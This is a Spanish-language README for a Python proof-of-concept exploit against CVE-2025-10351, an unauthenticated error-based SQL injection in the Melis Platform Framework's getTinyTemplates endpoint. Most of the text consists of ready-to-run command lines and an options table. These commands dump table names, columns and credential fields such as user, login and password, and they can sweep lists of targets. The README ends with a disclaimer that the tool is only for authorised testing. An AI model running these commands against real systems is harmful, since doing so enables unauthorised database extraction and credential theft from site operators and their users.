
Exploit para CVE-2025-10351. Inyección SQL en Melis Platform Framework
POC para CVE-2025-10351: Una vulnerabilidad de Inyección SQL no autenticada que afecta a un endpoint específico en el Framework de la Plataforma Melis.
Este POC ataca una vulnerabilidad de inyección SQL basada en errores no autenticada en el endpoint:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
Utiliza updatexml() en MySQL para extraer:
También detecta posibles vectores de SQLi basado en tiempo para una explotación manual adicional.
Instala las dependencias con:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
| Argumento | Descripción |
|---|---|
-u | URL objetivo |
-p | Puerto (80, 443, etc.) |
-l | Archivo que contiene lista de URLs |
-s | Tiempo de espera para pruebas basadas en tiempo (por defecto: 1s) |
-at | Volcar todos los nombres de tablas |
-t | Especificar nombre de tabla |
-ac | Volcar todas las columnas de la tabla indicada |
-c | Lista separada por comas de columnas a volcar |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | Deshabilitar verificaciones TLS al usar conexiones proxy |
--cookie | Cookies para solicitudes de autenticación |
--debug | Modo de depuración |
tables_extracted.txt<table_name>_data.txtEste documento es solo para pruebas de seguridad autorizadas y remediación. No uses el PoC ni los pasos de reproducción contra sistemas que no te pertenezcan o para los cuales no tengas permiso explícito para probar. El autor no se hace responsable del mal uso.
Hecho con ❤️ por Manuel Iván San Martín Castillo